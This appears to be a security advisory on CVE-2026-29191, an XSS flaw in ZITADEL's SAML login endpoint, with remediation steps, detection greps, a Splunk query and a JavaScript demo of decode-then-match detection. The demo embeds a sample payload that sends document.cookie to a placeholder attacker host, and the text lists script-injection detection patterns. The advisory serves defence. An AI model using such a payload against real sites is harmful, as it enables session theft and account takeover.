Executive Summary
The ZITADEL security team has disclosed CVE-2026-29191, a critical cross-site scripting (XSS) vulnerability in the open-source identity management platform's login V2 interface. The flaw resides in the /saml-post endpoint and enables a 1-click account takeover — an attacker can craft a malicious SAML response that injects arbitrary JavaScript into the victim's browser session, hijacking authentication tokens and fully compromising the targeted account.
CVSS Score: 9.3 (Critical)
All ZITADEL deployments running versions 4.0.0 through 4.11.1 are affected. The issue has been resolved in version 4.12.0, released March 7, 2026.
Vulnerability Overview
Root Cause
ZITADEL's login V2 /saml-post endpoint processes SAML assertion responses during federated authentication flows. The endpoint failed to properly sanitize and encode attacker-controlled values within the SAML response before rendering them in the browser. This unsanitized output creates a DOM injection point that executes arbitrary JavaScript in the context of the authenticated ZITADEL session.
Because the XSS fires in the ZITADEL origin, the injected script runs with the victim's ambient credentials. It can read any cookies and browser storage not marked HttpOnly, capture OIDC tokens and in-flight authentication state handled by the page, and, even where the session cookie is HttpOnly, drive the session from inside the browser by issuing requests that carry it. The result is full account takeover.
Attack Vector
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29191 |
| CVSS Score | 9.3 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N |
| CWE | CWE-79: Cross-Site Scripting |
| Attack Type | 1-Click Account Takeover via XSS |
| Authentication Required | None (attacker-controlled IdP sufficient) |
| User Interaction | Required (victim must click a crafted link) |
| Affected Component | Login V2 /saml-post endpoint |
| Disclosure Date | March 7, 2026 |
Technical Details
Attack Chain
1. Attacker controls a SAML Identity Provider (IdP) or intercepts a SAML flow
2. Crafts a malicious SAML response containing XSS payload in assertion attributes
3. Generates a link that initiates a SAML auth flow with ZITADEL as SP
4. Victim clicks the link — browser submits the crafted SAMLResponse via POST
5. ZITADEL /saml-post renders unsanitized attribute values into the page DOM
6. Injected JavaScript executes in the ZITADEL origin context
7. Script exfiltrates session tokens, cookies, or performs actions as the victim
8. Full account takeover achieved with a single user interaction
Why This Is Severe
The /saml-post endpoint is part of the Service Provider (SP)-initiated SAML flow — a standard federation pattern used across enterprise SSO integrations. Because ZITADEL acts as an identity provider itself, a successful exploit grants the attacker access not just to ZITADEL but to every downstream application that trusts ZITADEL tokens, including OIDC/OAuth2 clients configured in the organization.
The CVSS vector spells out why: the flaw is reachable over the network with low attack complexity (AV:N/AC:L) and requires no privileges on the instance (PR:N), so the only precondition is that the victim follows a link or otherwise lets their browser submit the crafted response (UI:R). Any threat actor who can get a malicious SAML response posted to the victim's browser can exploit it.
Affected Versions
| ZITADEL Version | Status | Action Required |
|---|---|---|
| 4.0.0 – 4.11.1 | Vulnerable | Upgrade immediately to 4.12.0 |
| 4.12.0+ | Patched | No action required |
| < 4.0.0 | Not affected (Login V2 absent) | Review upgrade path |
Remediation
Immediate Action: Upgrade to 4.12.0
The only complete fix is upgrading ZITADEL to version 4.12.0 or later. ZITADEL 4.12.0 introduces proper output encoding of SAML assertion attributes before DOM rendering in the login V2 interface. If your deployment runs the login V2 UI as its own container or deployment alongside the ZITADEL core, update that image to the patched release as well; upgrading only the core API leaves the vulnerable UI in place.
```bash
# Docker — pull latest patched image
docker pull ghcr.io/zitadel/zitadel:v4.12.0
# Kubernetes — update your Helm values or image tag
helm upgrade zitadel zitadel/zitadel \
  --set image.tag=v4.12.0
# Binary deployment — download from GitHub releases
# https://github.com/zitadel/zitadel/releases/tag/v4.12.0
```
Temporary Mitigations (If Immediate Upgrade Is Not Possible)
- Disable SAML federation: if your deployment does not require SAML, remove or disable the SAML identity provider configurations so that no flow reaches /saml-post. This removes the attack surface rather than filtering it.
- Restrict external IdP connections: keep only SAML Identity Providers you trust, allowlisting their metadata URLs, and review each configured IdP. The attack needs a SAML response that the victim's browser will post to your instance, and every configured IdP is a path for that.
- WAF rule on /saml-post: a rule that looks for script injection patterns (<script>, javascript:, event handlers) in the raw POST body will not match, because the SAML POST binding carries the SAMLResponse parameter base64-encoded. The rule must URL-decode and then base64-decode SAMLResponse (and separately inspect RelayState, which is plain text) before matching, and even then it is a partial control that encoding variations can slip past. Treat it as a stopgap, not a fix.
- Enable MFA/Passwordless for all accounts: MFA does not prevent the XSS, and a script running inside an already-authenticated session acts with that session's privileges regardless of how it was established. It still raises the bar for an attacker who ends up with only a password or reset link rather than a live session, and it is worth having for the related password-reset issue disclosed in the same batch.
Detection
Identify Suspicious SAML POST Requests
Review web/application logs for /saml-post requests containing anomalous assertion content. Two caveats apply. The nginx access log does not record POST bodies by default, so a pattern grep over it only catches payloads that land in the query string or in RelayState. And the SAMLResponse parameter is base64-encoded in the POST binding, so even with body logging in place (for example a custom log_format that includes $request_body on the reverse proxy) the parameter has to be URL-decoded and base64-decoded before any script pattern can match.
```bash
# Nginx access log: only finds payloads in the query string or RelayState,
# since POST bodies are not logged by default and SAMLResponse is base64
grep "POST /saml-post" /var/log/nginx/access.log | \
  grep -E "(<script|javascript:|onerror=|onload=)"
# ZITADEL application logs — look for rendering errors near saml-post
journalctl -u zitadel --since "2026-03-01" | grep -i "saml-post"
```
SIEM Query (Splunk)
```
index=web_logs uri="/saml-post" method=POST
| eval payload=urldecode(form_data)
| where match(payload, "(?i)(<script|javascript:|onerror=|onload=|<img[^>]+src=)")
| stats count by src_ip, uri, _time
| sort -_time
```
This query only fires if form_data holds the decoded assertion text. urldecode() reverses percent-encoding but not base64, and SPL's built-in eval functions do not include a base64 decoder, so decode the SAMLResponse parameter at ingest (or with a decoding add-on) and run the match against that field. Matches on RelayState need no decoding.
Indicators of Compromise
- Unexpected SAML POST requests to /saml-post originating from unfamiliar IdP domains (check the Referer or Origin of the POST and the Issuer element in the decoded response)
- User sessions appearing from IP addresses inconsistent with the user's geography (post-token theft)
- API calls or admin actions performed shortly after SAML authentication from new IP addresses
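The WAF rule under Temporary Mitigations, the access-log grep and the Splunk query above all pattern-match the raw request, and against the SAML POST binding that cannot work: SAMLResponse is base64-encoded, so a string like <script never appears in the body. This added example (written for this page; not ZITADEL's code and not a vendor detection rule) builds two constructed /saml-post request bodies, one benign and one carrying the payload from the attack chain, then runs both the naive raw-body match and a decode-then-match check over them. The SAML XML is a stripped-down construction with no signature, the app.example.com and attacker.example hosts are placeholders, and the pattern list mirrors the regexes used in the text.

```javascript
// Added example (not ZITADEL's code, not a vendor rule): why regex matching
// on the raw /saml-post body misses the payload, and how to scan it properly.
// All request bodies and XML below are constructed sample data.

// Same patterns the text's grep/WAF rule looks for.
const SCRIPT_PATTERNS = /<script\b|javascript:|\bon(?:error|load|click|focus)\s*=|<img\b[^>]*\bsrc\s*=/i;

// Build a minimal SAML Response around [name, value] attribute pairs
// (constructed; real responses are signed and far larger).
function buildSamlResponse(attrs) {
  const values = attrs.map(([n, v]) =>
    `<saml:Attribute Name="${n}"><saml:AttributeValue>${v}</saml:AttributeValue></saml:Attribute>`).join('');
  return `<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ` +
         `xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:Assertion>` +
         `<saml:AttributeStatement>${values}</saml:AttributeStatement>` +
         `</saml:Assertion></samlp:Response>`;
}

// Encode the way a browser submits the POST binding: base64, then form-urlencoded.
function encodePostBody(xml, relayState = '') {
  const b64 = Buffer.from(xml, 'utf8').toString('base64');
  return `SAMLResponse=${encodeURIComponent(b64)}&RelayState=${encodeURIComponent(relayState)}`;
}

// Naive check, modelled on the grep/WAF rule in the text: regex over the raw body.
function rawBodyLooksMalicious(body) {
  return SCRIPT_PATTERNS.test(body);
}

// Proper check: url-decode the form, base64-decode SAMLResponse, then inspect
// the XML. RelayState is plain text and is inspected as-is.
function decodedBodyLooksMalicious(body) {
  const params = new URLSearchParams(body);
  const xml = Buffer.from(params.get('SAMLResponse') || '', 'base64').toString('utf8');
  const relay = params.get('RelayState') || '';
  return SCRIPT_PATTERNS.test(xml) || SCRIPT_PATTERNS.test(relay);
}

// Constructed sample bodies: one benign, one carrying the payload from the
// attack chain inside an AttributeValue.
const RELAY = 'https://app.example.com/dashboard';
const BENIGN_BODY = encodePostBody(buildSamlResponse([
  ['email', 'alice@example.com'], ['displayName', 'Alice Example'],
]), RELAY);
const MALICIOUS_BODY = encodePostBody(buildSamlResponse([
  ['email', 'alice@example.com'],
  ['displayName', '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
]), RELAY);

// Run both checks over a list of captured bodies.
function scan(bodies) {
  return bodies.map((body) => ({
    raw: rawBodyLooksMalicious(body),
    decoded: decodedBodyLooksMalicious(body),
  }));
}

console.log(scan([BENIGN_BODY, MALICIOUS_BODY]));
// raw is false for BOTH bodies (the base64 hides the payload);
// decoded is false for the benign body and true for the malicious one.
```

The same decode step belongs in front of whatever matcher you use, whether a WAF rule, a log pipeline or the Splunk query: match on the decoded assertion and on RelayState, never on the raw form body. Note also that the decoded check is still a signature, so treat a hit as a lead to investigate rather than a complete detection.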
Related ZITADEL Vulnerabilities (March 2026 Batch)
Three additional ZITADEL vulnerabilities were disclosed simultaneously on March 7, 2026:
| CVE | Description | CVSS | Severity |
|---|---|---|---|
| CVE-2026-29191 | XSS in /saml-post — 1-click account takeover | 9.3 | Critical |
| CVE-2026-29067 | Password reset host header injection — account takeover | 8.1 | High |
| CVE-2026-29192 | Stored XSS via Default URI Redirect — account takeover | 7.7 | High |
| CVE-2026-29193 | Login V2 UI policy bypass — unauthorized self-registration | TBD | TBD |
Organizations running ZITADEL should treat the March 7, 2026 release as a critical security patch addressing multiple high-severity account takeover vectors in the login V2 interface.
About ZITADEL
ZITADEL is an open-source, cloud-native identity and access management (IAM) platform written in Go. It acts as an OIDC/OAuth2 and SAML identity provider, federates to external identity providers (playing the service provider role toward upstream SAML IdPs), and provides user management. Organizations self-hosting ZITADEL as their authentication layer must apply the upgrade themselves and are therefore most exposed; ZITADEL Cloud instances are operated by the vendor, which is responsible for patching them.